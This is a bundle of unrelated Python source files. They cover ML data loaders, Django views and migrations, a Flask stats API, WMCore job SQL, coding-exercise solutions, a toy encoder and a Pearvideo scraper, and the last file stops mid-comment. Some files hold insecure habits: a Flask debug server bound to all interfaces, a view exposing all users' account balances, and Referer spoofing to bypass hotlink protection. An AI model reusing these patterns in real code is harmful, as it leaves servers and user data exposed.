labels Returns: all_probs (np.array): Estimated probabilites of each sample for each class, shape (n_samples, n_classes) model Trained model """ dt = tree.DecisionTreeClassifier(max_depth=maxDepth) model = dt.fit(inputs_train, lbl_np1d_train) all_probs = model.predict_proba(inputs_test) return all_probs, model def get_training_data(lbl_np1d, full_input_data): """Creates training and testing datasets from input image and mask. Args: lbl_np1d (np.array): mask of desired training data full_input_data (np.array): all of the image data Returns: full_input_data (np.array): testing data train_subset (np.array): training data """ train_subset = full_input_data[lbl_np1d > 0] # full_input_data[lbl_np1d < 1] = 0 # Set AIR to code 0 return full_input_data, train_subset def create_train_test_arrays(feature_images): """Combines all features to create train and test datasets. Args: feature_images (list): Each list element is tuple of np.arrys for training and testing data for 1 feature Returns: inputs_test (np.array): Testing dataset inputs_train (np.array): Training dataset """ test_set = list() train_set = list() for tup in feature_images: test_set.append(tup[0].T) train_set.append(tup[1].T) inputs_test = np.dstack(tuple(test_set)) # remove 0 dimension inputs_test.shape = (inputs_test.shape[1], inputs_test.shape[2]) inputs_train = np.dstack(tuple(train_set)) # remove 0 dimension inputs_train.shape = (inputs_train.shape[1], inputs_train.shape[2]) return inputs_test, inputs_train def plot_decision_boundary(model, feat1_np1d, feat2_np1d, label_np1d, class_labels): """Plots the decision boundary for the classifier Args: model : A trained model using sklearn modules feat1_np1d (np.array) : training data, first feaure feat2_np1d (np.array) : training data, second feature label_np1d (np.array) : training data labels """ fig = plt.figure(figsize=(10, 20)) gs = gridspec.GridSpec(3, 1) gs.update(wspace=0.1, hspace=0.1) # create grid of entire feature space x_min, x_max = feat1_np1d.min() - 1, feat1_np1d.max() + 1 y_min, y_max = feat2_np1d.min() - 1, feat2_np1d.max() + 1 xx, yy = np.meshgrid(np.arange(x_min, x_max, 1), np.arange(y_min, y_max, 1)) Z = model.predict_proba(np.c_[xx.ravel(), yy.ravel()]) # class label colors for scatter points colors = {'WM': 'w', 'GM': 'c', 'CSF': 'k'} labels = ['WM', 'GM', 'CSF'] # plot probability map over feature space for each class for ind, label in enumerate(labels): ax = plt.subplot(gs[ind]) pred = Z[:, ind] pred = pred.reshape(xx.shape) # plot probability contours v = np.linspace(0.0, 1.0, 7, endpoint=True) cont = ax.contourf(xx, yy, pred, v, cmap=plt.cm.RdBu, alpha=0.6) ax.contour(xx, yy, pred, levels=[0.5], colors='black') # plot points for each class for ind2, label2 in enumerate(labels): xc = [val for i, val in enumerate(feat1_np1d) if label_np1d[i] == class_labels[label2]] yc = [val for i, val in enumerate(feat2_np1d) if label_np1d[i] == class_labels[label2]] cols = colors[label2] * len(xc) ax.scatter(xc, yc, c=cols, label=label2) ax.set_title(label + ' Probability') ax.set_xlabel('T1') ax.set_ylabel('T2') ax.legend() fig.colorbar(cont, shrink=0.9, ticks=v) plt.show() def get_random_sample(feat1_np1d, feat2_np1d, label_np1d, LABELS, num_per_class=100): """ """ feat1 = [] feat2 = [] feat1_train = np.array([]) feat2_train = np.array([]) label_train = np.array([]) for label in LABELS: value = LABELS[label] feat1 = feat1_np1d[label_np1d == value] feat2 = feat2_np1d[label_np1d == value] ind = [x for x in range(0, feat1.shape[0])] np.random.shuffle(ind) ind_sub = ind[0:num_per_class] feat1_train = np.hstack((feat1_train, feat1[ind_sub])) feat2_train = np.hstack((feat2_train, feat2[ind_sub])) label_train = np.hstack((label_train, value * np.ones(num_per_class))) train = np.column_stack((feat1_train, feat2_train)) return train, label_train def get_accuracy(pred, lbl): """ Compute the accuracy of the values based on the machine learning model """ correct = sum((np.logical_and(pred == lbl, lbl > 0)).astype(int)) total = sum((lbl > 0).astype(int)) return float(correct) / total

import argparse import os from model_temp import Temp_RFRNetModel from dataset_temp import Tem_Dataset from torch.utils.data import DataLoader def run(): parser = argparse.ArgumentParser() #训练数据的位置 parser.add_argument('--data_root', type=str, default='/home/yaoziqiang/py_project/train&test_data/train_mavg') parser.add_argument('--mask_root', type=str, default='/home/yaoziqiang/py_project/mask_level/70_360') ################# 测试数据路径######################### # data parser.add_argument('--test_data', type=str, default='/home/yaoziqiang/climate_data/station_data/test_data/data') #/home/yaoziqiang/py_project/train&test_data/test_mavg #/home/yaoziqiang/climate_data/station_data/test_data/data # mask parser.add_argument('--test_mask', type=str, default='/home/yaoziqiang/climate_data/station_data/test_data/mask') #/home/yaoziqiang/py_project/mask_level/70 #/home/yaoziqiang/climate_data/station_data/test_data/mask ##################################################### #模型保存位置 parser.add_argument('--model_save_path', type=str, default='/home/yaoziqiang/py_project/RFR/results/mask70/bavg_ckpt') #测试结果保存位置 parser.add_argument('--result_save_path', type=str, default='/home/yaoziqiang/py_project/RFR/results/mask70/station_data') parser.add_argument('--num_iters', type=int, default=80001)#训练迭代次数450000 #训练时的模型位置 parser.add_argument('--model_path', type=str, default="/home/yaoziqiang/py_project/RFR/results/mask70/bavg_ckpt/(new)temp_70_76000ft.pth")#可能要改 #测试时的模型位置 parser.add_argument('--test_model_path', type=str,default="/home/yaoziqiang/py_project/RFR/results/mask70/bavg_ckpt/") # 可能要改 #/home/yaoziqiang/py_project/RFR/results/mask70/mdata_ckpt/ parser.add_argument('--batch_size', type=int, default=60) parser.add_argument('--n_threads', type=int, default=0) parser.add_argument('--finetune', action='store_true') parser.add_argument('--test', action='store_true') parser.add_argument('--gpu_id', type=str, default="0") args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id#指定要使用的GPU model = Temp_RFRNetModel() if args.test: dataloader = DataLoader( Tem_Dataset(args.test_data, args.test_mask,training=False))#默认不打乱数据 #测试某个模型 model.initialize_model(args.test_model_path + '(new)temp_70_80000.pth', False) model.cuda() model.test(dataloader, args.result_save_path, 80000) print('{:d}th model was tested'.format(80000)) for i in range(76000, 162000, 2000): model.initialize_model(args.test_model_path+'temp_70_{:d}ft.pth'.format(i), False) model.cuda() model.test(dataloader, args.result_save_path, i) print('{:d}th model was tested'.format(i)) for j in range(76000, 162000, 2000): path = './rmse_70/b254_rmse_70({:d})ft.txt'.format(j) f = open(path,'r') sum = 0.0 for line in f.readlines(): sum += float(line[10:16])# avg = sum/120 avgrmse_path = './avg_b254_70ft.txt' f_w = open(avgrmse_path, 'a+') f_w.write('avgrmse:' + str(avg) + '\r\n') else: model.initialize_model(args.model_path, True) model.cuda() #打开训练数据，并加载如dataloader dataloader = DataLoader(Tem_Dataset(args.data_root, args.mask_root), batch_size = args.batch_size, shuffle = True, num_workers = args.n_threads) model.train(dataloader, args.model_save_path, args.finetune, args.num_iters) if __name__ == '__main__': run()

class NumMatrix(object): def __init__(self, matrix): row_num = len(matrix) col_num = len(matrix[0]) if row_num > 0 else 0 m = [[0 for i in range(col_num + 1)] for j in range(row_num + 1)] for i in range(1, row_num + 1): for j in range(1, col_num + 1): m[i][j] = m[i-1][j] + m[i][j-1] - m[i-1][j-1] + matrix[i-1][j-1] self.m = m def sumRegion(self, row1, col1, row2, col2): x1 = row1 + 1 x2 = row2 + 1 y1 = col1 + 1 y2 = col2 + 1 m = self.m return m[x2][y2] + m[x1-1][y1-1] - m[x2][y1-1] - m[x1-1][y2]

""" 자연수 A, B가 주어지면 A+B를 구하는 프로그램을 작성하시오. 입력 자연수 A, B (0 < A, B ≤ 10)가 첫 번째 줄에 주어진다. 단, 두 수의 사이에는 공백이 주어지지 않는다. 두 수의 앞에 불필요한 0이 붙는 경우는 없다. 출력 첫 번째 줄에 A+B의 값을 출력한다. 예제 입력 1 37 예제 출력 1 10 """ s=input() r=0 for i in range(0, len(s)): if int(s[i]) == 0: r += 9 r += int(s[i]) print(r)

#is 练习：判断二个变量是否为同一个对象，是否指向同一个内存地址 stu_list=['王利利',24,88888.88] print(id(stu_list)) #地址传递 stu2_list=stu_list print(id(stu2_list)) #is 运算 if stu_list is stu2_list: print('A is B') else : print('A is not B') #值传递，再开辟一个空间存放数据 c=stu_list[:] #切片没头没尾就是全部复制 print(id(c)) #查看内存地址 if c is stu_list: print( 'C is A') else: print('C is not A') # 看代码猜结果 stu_list[0]='王小利' print(stu_list[0]) print(stu2_list[0]) print(c[0])

''' author: juzicode address: www.juzicode.com 公众号: 桔子code/juzicode date: 2020.8.1 ''' print('\n') print('-----欢迎来到www.juzicode.com') print('-----公众号: 桔子code/juzicode \n') from ctypes import * class TuTest(Union): #定义ctypes类型的“结构体” _fields_ = [('a', c_char), ('b', c_int), ('c', c_longlong) ] test = TuTest( b'a',100,200) #初始化 print('a:',test.a) #使用成员变量 print('b:',test.b) print('c:',test.c) pyt = CDLL('pytest.dll') #加载dll pyt.trans_union.restype=c_int #声明返回参数类型和入参类型 pyt.trans_union.argtypes=(TuTest,) pyt.trans_union(test) #调用

from django.contrib.auth.mixins import LoginRequiredMixin from django.views.generic import ListView, CreateView, UpdateView, TemplateView from django.contrib.auth import login, authenticate from django.shortcuts import render, redirect from django.urls import reverse_lazy from functools import wraps from chartjs.views.lines import BaseLineChartView from django.http import HttpResponse,HttpResponseRedirect, JsonResponse import json from django.core.serializers.json import DjangoJSONEncoder from django.core import serializers from django.core.serializers import serialize from apps.usuarios.forms import SignUpForm from apps.usuarios.models import User from apps.cuentas.models import Cuenta from apps.presupuestos.models import * def signup(request): if request.method == 'POST': form = SignUpForm(request.POST) if form.is_valid(): user= form.save(commit=False) username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('password1') user.es_cliente =True user.save() user = authenticate(username=username, password=raw_password) login(request, user) return redirect('cuentas:listado_de_cuentas') else: form = SignUpForm() return render(request, 'usuarios/signup.html', {'form': form}) def Inicio(request): cuentas = request.user.cuentas_del_usuario.filter(estado='Activa') presupuestos = request.user.presupuestos_del_usuario.filter(estado="Activo")#mes__month=3 contexto = {'cuentas':cuentas,'presupuestos':presupuestos} print("inicio") print(contexto) return render(request,'usuarios/inicio.html', {'cuentas':cuentas,'presupuestos':presupuestos}) def presupuestos_serialize(presupuesto): categorias = presupuesto.categorias_del_presupuesto.all() categorias = [ {'categoria_nombre': categoria.nombre, 'categoria_planeado': categoria.planeado, 'categoria_actual':categoria.actual} for categoria in categorias] return {'id':presupuesto.id,'nombre':presupuesto.nombre, 'total_planeado':presupuesto.total_planeado, 'total_actual':presupuesto.total_actual, 'categorias':categorias} def getGraficPie(request): presupuestos = request.user.presupuestos_del_usuario.filter(estado="Activo") presupuestos = [ presupuestos_serialize(presupuesto) for presupuesto in presupuestos ] return HttpResponse(json.dumps(presupuestos,cls=DjangoJSONEncoder), content_type = "application/json") def getCuentas(request): cuentas = request.user.cuentas_del_usuario.filter(estado='Activa') cuentas = [ {'cuenta_id':cuenta.id} for cuenta in cuentas ] return HttpResponse(json.dumps(cuentas,cls=DjangoJSONEncoder), content_type = "application/json") class CuentasSaldo(BaseLineChartView): def get_labels(self): nombres_cuentas = list(Cuenta.objects.filter(usuario=1).values_list("nombre", flat=True)) return nombres_cuentas def get_providers(self): return [" NOTHING "] def get_data(self): cuentas = Cuenta.objects.all() saldo_cuentas = [] for cuenta in cuentas: saldo_cuenta = cuenta.saldo saldo_cuentas.append(saldo_cuenta) return [saldo_cuentas] vista_cuentas_y_saldo = TemplateView.as_view(template_name='usuarios/inicio.html') cuentas_y_saldo_json = CuentasSaldo.as_view()

# Generated by Django 2.1.2 on 2019-05-02 14:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('scheduler', '0027_request_path'), ] operations = [ migrations.AlterField( model_name='request', name='date_time', field=models.CharField(default='', max_length=128, unique=True), ), ]

# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('course_selection', '0006_auto_20141124_1441'), ] operations = [ migrations.AlterField( model_name='semester', name='term_code', field=models.CharField(default=1152, unique=True, max_length=4, db_index=True), preserve_default=True, ), ]

from django.contrib import admin from detectdata.models import * # Register your models here. admin.site.register(Detect)

from flask import Flask, jsonify import time from stats_helper import StatsHelper from flask_cors import CORS import simplejson as json # instead of import json app = Flask(__name__) CORS(app) stats_helper = StatsHelper() #Used to bring in employee table information # @app.route('/') # def home(): # return json.dumps(stats_helper.select_all_employee) # #Used bring in stats # @app.route('/Total_Exercise_Hours') # def exercies_hours_total(): @app.route('/') def homepage(): return json.dumps(stats_helper.select_all()) #@app.route('/employee') #def employee(): #return json.dumps(stats_helper.select_all_employee()) @app.route('/calcExercise') def calcExercise(): return json.dumps(stats_helper.calculate_total_exercise()) @app.route('/highestMonth') def highestMonth(): return json.dumps(stats_helper.highest_month()) @app.route('/totalStaff') def totalStaff(): return json.dumps(stats_helper.totalStaff()) @app.route('/avgEmployeeAge') def avgEmployeeAge(): return json.dumps(stats_helper.avgEmployeeAge()) @app.route('/alldata') def alldata(): return json.dumps(stats_helper.join_all()) print("### Application started...") if __name__ == '__main__': app.run(debug=True, host='0.0.0.0')

#!/usr/bin/env python """ _LoadForErrHandler_ MySQL implementation of Jobs.LoadForErrorHandler. """ from WMCore.Database.DBFormatter import DBFormatter from WMCore.WMBS.File import File from WMCore.DataStructs.Run import Run class LoadForErrorHandler(DBFormatter): """ _LoadForErrorHandler_ Retrieve meta data for a job given it's ID. This includes the name, job group and last update time. It also works for the AccountantWorker to determine ACDC records for skipped files in successful jobs, this mode is used when a file selection is provided. """ sql = """SELECT wmbs_job.id, jobgroup, wmbs_job.name AS name, wmbs_job_state.name AS state, state_time, retry_count, couch_record, cache_dir, wmbs_location.site_name AS location, outcome AS bool_outcome, fwjr_path AS fwjr_path, ww.name as workflow, ww.task as task, ww.spec as spec, wmbs_users.owner as owner, wmbs_users.grp as grp FROM wmbs_job INNER JOIN wmbs_jobgroup ON wmbs_jobgroup.id = wmbs_job.jobgroup INNER JOIN wmbs_subscription ON wmbs_subscription.id = wmbs_jobgroup.subscription INNER JOIN wmbs_workflow ww ON ww.id = wmbs_subscription.workflow INNER JOIN wmbs_users ON ww.owner = wmbs_users.id LEFT OUTER JOIN wmbs_location ON wmbs_job.location = wmbs_location.id LEFT OUTER JOIN wmbs_job_state ON wmbs_job.state = wmbs_job_state.id WHERE wmbs_job.id = :jobid""" fileSQL = """SELECT wfd.id, wfd.lfn, wfd.filesize size, wfd.events, wfd.first_event, wfd.merged, wja.job jobid, wls.pnn pnn FROM wmbs_file_details wfd INNER JOIN wmbs_job_assoc wja ON wja.fileid = wfd.id INNER JOIN wmbs_file_location wfl ON wfl.fileid = wfd.id INNER JOIN wmbs_location wl ON wl.id = wfl.location INNER JOIN wmbs_location_pnns wls ON wls.location = wfl.location WHERE wja.job = :jobid""" parentSQL = """SELECT parent.lfn AS lfn, wfp.child AS id FROM wmbs_file_parent wfp INNER JOIN wmbs_file_details parent ON parent.id = wfp.parent WHERE wfp.child = :fileid """ runLumiSQL = """SELECT fileid, run, lumi FROM wmbs_file_runlumi_map WHERE fileid = :fileid""" def formatJobs(self, result): """ _formatJobs_ Cast the id, jobgroup and last_update columns to integers because formatDict() turns everything into strings. """ formattedResult = DBFormatter.formatDict(self, result) for entry in formattedResult: if entry["bool_outcome"] == 0: entry["outcome"] = "failure" else: entry["outcome"] = "success" del entry["bool_outcome"] entry['group'] = entry['grp'] entry['input_files'] = [] return formattedResult def execute(self, jobID, fileSelection = None, conn = None, transaction = False): """ _execute_ Execute the SQL for the given job ID and then format and return the result. """ if type(jobID) == list: if len(jobID) < 1: # Nothing to do return [] binds = jobID else: binds = {"jobid": jobID} result = self.dbi.processData(self.sql, binds, conn = conn, transaction = transaction) jobList = self.formatJobs(result) filesResult = self.dbi.processData(self.fileSQL, binds, conn = conn, transaction = transaction) fileList = self.formatDict(filesResult) fileBinds = [] if fileSelection: fileList = filter(lambda x : x['lfn'] in fileSelection[x['jobid']], fileList) for x in fileList: # Add new runs x['newRuns'] = [] # Assemble unique list of binds if not {'fileid': x['id']} in fileBinds: fileBinds.append({'fileid': x['id']}) parentList = [] if len(fileBinds) > 0: parentResult = self.dbi.processData(self.parentSQL, fileBinds, conn = conn, transaction = transaction) parentList = self.formatDict(parentResult) lumiResult = self.dbi.processData(self.runLumiSQL, fileBinds, conn = conn, transaction = transaction) lumiList = self.formatDict(lumiResult) lumiDict = {} for l in lumiList: if not l['fileid'] in lumiDict.keys(): lumiDict[l['fileid']] = [] lumiDict[l['fileid']].append(l) for f in fileList: fileRuns = {} if f['id'] in lumiDict.keys(): for l in lumiDict[f['id']]: run = l['run'] lumi = l['lumi'] try: fileRuns[run].append(lumi) except KeyError: fileRuns[run] = [] fileRuns[run].append(lumi) for r in fileRuns.keys(): newRun = Run(runNumber = r) newRun.lumis = fileRuns[r] f['newRuns'].append(newRun) filesForJobs = {} for f in fileList: jobid = f['jobid'] if not jobid in filesForJobs.keys(): filesForJobs[jobid] = {} if f['id'] not in filesForJobs[jobid].keys(): wmbsFile = File(id = f['id']) wmbsFile.update(f) wmbsFile['locations'].add(f['pnn']) for r in wmbsFile['newRuns']: wmbsFile.addRun(r) for entry in parentList: if entry['id'] == f['id']: wmbsFile['parents'].add(entry['lfn']) filesForJobs[jobid][f['id']] = wmbsFile else: # If the file is there, just add the location filesForJobs[jobid][f['id']]['locations'].add(f['pnn']) for j in jobList: if j['id'] in filesForJobs.keys(): j['input_files'] = filesForJobs[j['id']].values() return jobList

import random import string # randCharList = list(string.ascii_lowercase) + (list(string.ascii_uppercase)) randCharList = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&'()*+,-./:;<=>?@[\]^_`{|}~") def encode(msg): # randCharList = list(string.ascii_lowercase) + (list(string.ascii_uppercase)) # randCharList = list("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&'()*+,-./:;<=>?@[\]^_`{|}~") #amount of fake letters changes every time encodeLength = random.randrange(3,7) #letter changes evry time encodeChar = random.choice(randCharList) encodedMsg = "" for i in range(len(msg)): fakeLetterCount = 0 #different spot for encodedChar each time encodeCharSpot = random.randrange(1, encodeLength - 1) while fakeLetterCount < encodeLength: if fakeLetterCount == encodeCharSpot and encodeChar != msg[i]: encodedMsg += encodeChar else: fakeLetter = random.choice(randCharList) while fakeLetter == encodeChar: fakeLetter = random.choice(randCharList) encodedMsg += fakeLetter fakeLetterCount += 1 encodedMsg += msg[i] return encodedMsg, encodeChar def shiftCode(encodedMsg): shiftLength = random.randrange(0,10) newEncodedMsg = "" for i in range(len(encodedMsg)): currentIndex = randCharList.index(encodedMsg[i]) shiftedIndex = currentIndex + shiftLength newIndex = shiftedIndex % len(randCharList) newEncodedMsg+=randCharList[newIndex] return encodedMsg, shiftLength def main(): encodedMsg = "" efile = open("msg.txt", 'r') for line in efile: encodedMsg += line efile.close() levels = int(input("how many levels of encoding? ")) key = "" for i in range(levels): encodedMsg, secretChar = encode(encodedMsg) key+=secretChar encodedMsg, secretShift = shiftCode(encodedMsg) key+=str(secretShift) print("\n%s" % encodedMsg) print("\nkey: %s\n" % key) efile = open("encodedMsg.txt", 'w') efile.write(encodedMsg) efile.close() main()

""" @author:ming @file:梨视频下载.py @time:2021/10/26 """ import requests # https://www.pearvideo.com/video_1744464 页面链接 # https://video.pearvideo.com/mp4/adshort/20211025/cont-1744464-15787050_adpkg-ad_hd.mp4 播放链接 # https://video.pearvideo.com/mp4/adshort/20211025/1635257300512-15787050_adpkg-ad_hd.mp4 后端返回链接，加密处理过 # 页面 cont_id = "1744193" page_url = f"https://www.pearvideo.com/video_{cont_id}" video_status_url = f"https://www.pearvideo.com/videoStatus.jsp?contId={cont_id}&mrd=0.5267971241406777" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36", # 防盗链，访问当前链接的页面地址 "Referer": page_url } video_status_resp = requests.get(video_status_url, headers=headers) video_status_resp.close() video_status = video_status_resp.json() # 响应的系统时间 system_time = video_status["systemTime"] # 响应的加密播放链接 src_url = video_status["videoInfo"]["videos"]["srcUrl"] # 解密 download_url = src_url.replace(system_time, "cont-" + cont_id) # 下载 print(download_url) source_resp = requests.get(download_url, headers=headers) with open("videos/" + cont_id + ".mp4", mode="wb") as video_file: video_file.write(source_resp.content) source_resp.close() print("下载完成")

f = open('rosalind_ini3.txt', 'r') strings = f.readlines() f.close() marker = strings[1] a,b,c,d = [int(i) for i in marker.split(' ')] sequence = strings[0] print '{0} {1}'.format(sequence[a:b+1], sequence[c:d+1])

import matplotlib.mlab as mlab import matplotlib.pyplot as plt plt.figure(figsize=[6,3]) # plt.rcParams['figure.dpi'] = 200 #分辨率 # the histogram of the data plt.hist(df['Normalized Score'],bins=50,color='lightgray',edgecolor='black',alpha=0.75) plt.ylabel('Requests') plt.axis([-3, 3, 0, 300]) plt.grid(True,linestyle='--',color='gray') plt.show()

''' Created on Dec 22, 2014 @author: desposito ''' from Ingredient import Ingredient class Malt(Ingredient): ''' classdocs ''' def __init__(self, name, quantity, ppg, srm): ''' Constructor ''' Ingredient.__init__(self, name, quantity, "lbs", ppg=ppg, srm=srm) self.ppg = self.params["ppg"] self.srm = self.params["srm"] self.grist = 0.0

import re import pandas as pd from os.path import dirname,abspath import sys sys.path.append(dirname(dirname(abspath(__file__)))) from os.path import join as pjoin from sklearn.utils import shuffle import cv2 import numpy as np import torch from torch.utils.data import Dataset, DataLoader import xml.etree.ElementTree as ET import torchvision.transforms as transforms # 得到图片路径、label路径、label名称 def make_list(): path = 'D:\Python\CV\week12\week10_dataset\\0_annotation_train.txt' # 标注文件，含有图片名称、label、地址等信息 file = open(path,encoding='utf-8') source = file.read() label_path =[] # 存放label的路径 label_name = [] # 存放label名称 image_path = [] # 存放图片的路径 images = [] # 存放解析出来的含有图片路径的信息（文件夹名称和图片名称） LABEL_ROOT = 'D:\Python\CV\week12\\anjiang2020_admin-week10-dataset-master\week10-dataset\cvf-week11-datasets-all-labled\\annotation\V006\\annotations' IMAGE_ROOT = 'D:\Python\CV\week12\week10_dataset' for line in source.split("\n"): label = re.findall('"name":"(\w+)"', line) label_name.append(label) image = re.findall('image/(\w+)/(\w+)', line) images.append(image) for i in images: for j in i: a,b=j # a:文件夹名称 b:图片名称 image_adr = IMAGE_ROOT+ '\\' + a + '\\' + b +'.jpg' image_path.append(image_adr) label_adr = LABEL_ROOT+'\\' + a + '\\' + b +'.xml' label_path.append(label_adr) label_name.pop(-1) # 最后一个为空 df = pd.DataFrame({'image':image_path,'label':label_path,'class':label_name})#将图片路径，label路径和label名称写入csv文件 df = shuffle(df) # 乱序 df.to_csv(pjoin(IMAGE_ROOT,'Train.csv'),index=False,encoding='utf-8_sig')#保存文件 print('Train.csv saved') print(len(image_path),len(label_path),len(label_name)) return image_path,label_path,label_name # 虽然存放在不同列表中，但都是一一对应的 # 得到图片bbox的坐标信息（左上角坐标x1y1和右下角坐标x2y2） def get_bbox(label_list,image_list): bboxes = [] # 存放所有label的bbox坐标信息 # i = 0 for xml_file,image_file in zip( label_list,image_list): # 同时拿出一张图片的路径和对应label路径（图片路径和label路径是生成时对应好的） # i +=1 cv_img = cv2.imdecode(np.fromfile(image_file, dtype=np.uint8), -1) # 读取图像，解决imread不能读取中文路径的问题 h,w,c = cv_img.shape object = [] # 存放一张图片中的bbox坐标信息，可能有多个bbox tree = ET.parse(xml_file) # 解析读取xml函数 filename,_ = tree.find('filename').text.split('.') for size in tree.findall('size'): width = int(size.find('width').text) height = int(size.find('height').text) for obj in tree.findall('object'): bbox = obj.find('bndbox') obj_struct = [w * int(bbox.find('xmin').text) / width, # 列表形式存放一个bbox坐标信息 h * int(bbox.find('ymin').text) / height, w * int(bbox.find('xmax').text) / width, h * int(bbox.find('ymax').text) / height] object.append(obj_struct) # print(object[0]) # draw_img_rects(cv_img, object,i) bboxes.append(object) return bboxes # 与图片路径等信息也是一一对应的 # 在图片中画出bbox def draw_img_rects(image, object,i): # for bbox in object: bbox = object[0] xmin, ymin, xmax, ymax = bbox w = xmax - xmin h = ymax - ymin cv2.rectangle(image, (int(xmin), int(ymin)), (int(xmin) + int(w), int(ymin) + int(h)), (0, 255, 0), 10) # 在图片中画矩形框 cv2.namedWindow('img', cv2.WINDOW_NORMAL) cv2.imshow('img', image) cv2.imwrite('image/'+str(i)+'.jpg',image) cv2.waitKey(10) # 持续时长 # 将label名称对应到0~13个数字上 def make_label(label_name): classifier = {'百岁山':1,'怡宝':2,'百事可乐':3,'景甜':4,'娃哈哈':5,'康师傅':6,'苏打水':7, '天府可乐':8,'可口可乐':9,'农夫山泉':10,'恒大冰泉':11,'其它':12,'冰露':13} labels_list = [] for i in label_name: # label_name中存放的是分类的名称 if len(i)>1: i.pop(-1) for j in i: label = classifier[j] # 根据名称对应到数字 labels_list.append(label) return labels_list # 对应到数字的label # 计算图片的均值和方差 def get_mean_std(image_list): ''' file_name: train,txt img_path: 'week10_dataset/image/' 146 normMean = [140.7888129 131.87180331 126.43424442] normStd = [53.84969082 54.91440049 56.4051085 ] normMean = [142.20270479 131.69554463 126.34654796] normStd = [53.93910735 55.32934892 56.66741758] ''' means = [0, 0, 0] stdevs = [0, 0, 0] num_imgs = 0 for image_path in image_list: num_imgs += 1 # 记录图片的个数 img = cv2.imdecode(np.fromfile(image_path, dtype=np.uint8), -1)## 读取图像，解决imread不能读取中文路径的问题 img = np.array(img).astype(np.float32) for i in range(3): # 对图片三个通道分别求均值和方差，累加所有图片 means[i] += img[:, :, i].mean() stdevs[i] += img[:, :, i].std() means.reverse() stdevs.reverse() means = np.asarray(means) / num_imgs # 所有图片的均值和方差之和除以图片总数 stdevs = np.asarray(stdevs) / num_imgs # print("normMean = {}".format(means)) # print("normStd = {}".format(stdevs)) return means, stdevs class myDataset(DataLoader): image_size = 448 # 图片期待缩小到的尺寸 def __init__(self, image_path, labels_list, bboxes, train, transform): self.boxes = [] # tensor形式的所有坐标信息 self.labels = [] # 所有数字label self.image = [] # 所有图片路径 self.train = train self.transform = transform self.S = 14 # grid number 14*14 normally self.B = 2 # bounding box number in each grid self.classes_num = 14 # how many classes self.mean = (142, 132, 126) # RGB for image,label,bbox in zip(image_path,labels_list,bboxes): self.boxes.append(torch.tensor(bbox)) self.labels.append(label) self.image.append(image) self.num_samples = len(self.boxes) def __getitem__(self, idx): img = self.image[idx] img = cv2.imdecode(np.fromfile(img, dtype=np.uint8), -1)## 读取图像，解决imread不能读取中文路径的问题 box = self.boxes[idx] # print('box{}'.format(box)) # box = box.unsqueeze(0) # print('box{}'.format(box)) # print(box) labels = self.labels[idx] if self.train: # torch自带的transform会造成bbox的坐标,需要自己来定义数据增强 pass h, w, _ = img.shape box /= torch.LongTensor([w, h, w, h]).expand_as(box) # 坐标归一化处理，为了方便训练 img = self.BGR2RGB(img) # cv2读入的图片是BGR形式，pytorch pretrained model use RGB，所以要转换一下 img = self.subMean(img, self.mean) # 减去均值 img = cv2.resize(img, (self.image_size, self.image_size)) # 将所有图片都resize到指定大小\ target = self.encoder(box, labels) # 将图片标签编码到14x14*24的向量 for t in self.transform: img = t(img) return img, target def __len__(self): return self.num_samples def subMean(self, img, mean): mean = np.array(mean, dtype=np.float32) img = img - mean # img = img/(255.0/2)-1 # img = np.array(img,dtype=np.float32) return img def BGR2RGB(self, img): return cv2.cvtColor(img, cv2.COLOR_BGR2RGB) def encoder(self, boxes, labels): ''' 将图片标签编码到14x14*24的向量前10层为坐标信息，图片分成14*14个格子，bbox所在的格子的置信度为1，其他格子为0，后14层为分类信息，label对应的那一层为1，其他层为0 boxes (tensor) [[x1,y1,x2,y2]] labels (tensor) [...] return 14x14x24 ''' # print(boxes) grid_num = 14 yolo_output = 24 # 5*2+14 target = torch.zeros((grid_num, grid_num, yolo_output)) cell_size = 1. / grid_num # 每个格子的大小 # 右下坐标左上坐标 # x2,y2 x1,y1 x2y2 = boxes[:,2:] # 所有的bbox x1y1 = boxes[:,:2] wh = x2y2 - x1y1 cxcy = (x2y2 + x1y1) / 2 # 中心点坐标 for i in range(cxcy.size()[0]): # cxcy.size()[0]代表一张图像的物体总数，遍历一张图像的物体总数 # 物体中心坐标 cxcy_sample = cxcy[i] # 指示落在那网格，如[0,0] ij = (cxcy_sample / cell_size).ceil() - 1 # 中心点对应格子的坐标# ceil返回数字的上入整数 # cxcy_sample为一个物体的中心点坐标，求该坐标位于14x14网格的哪个网格 # cxcy_sample坐标在0-1之间现在求它再0-14之间的值，故乘以14 # ij长度为2，代表14x14框的某一个框负责预测一个物体 # 0 1 2 3 4 5 6 7 8 9 # target[中心坐标,长宽,置信度,中心坐标,长宽,置信度, 14个类别] x 14x14 因为一个框预测两个物体 # 每行的第4和第9的值设置为1，即每个网格提供的两个真实候选框框住物体的概率是1. # xml中坐标理解：原图像左上角为原点，右边为x轴，下边为y轴。 # 而二维矩阵（x，y） x代表第几行，y代表第几列 # 假设ij为（1,2）代表x轴方向长度为1，y轴方向长度为2 # 二维矩阵取（2,1）从0开始，代表第2行，第1列的值 # 第一个框的置信度 target[int(ij[1]), int(ij[0]), 4] = 1 # 第二个框的置信度 target[int(ij[1]), int(ij[0]), 9] = 1 # 类别，加9是因为前0-9为两个真实候选款的值。后10-20为20分类将对应分类标为1 target[int(ij[1]), int(ij[0]), int(labels) + 9] = 1 # xy为归一化后网格的左上坐标---->相对整张图 xy = ij * cell_size # 匹配到的网格的左上角相对坐标 # 物体中心相对左上的坐标 ---> 坐标x,y代表了预测的bounding # box的中心与栅格边界的相对值 # delta_xy：真实框的中心点坐标相对于位于该中心点所在网格的左上角的相对坐标，此时可以将网格的左上角看做原点，你这点相对于原点的位置。取值在0-1，但是比1/14小 delta_xy = (cxcy_sample - xy) / cell_size # 其实就是offset # (1) 每个小格会对应B(2)个边界框，边界框的宽高范围为全图，表示以该小格为中心寻找物体的边界框位置。 # (2) 每个边界框对应一个分值，代表该处是否有物体及定位准确度 # (3) 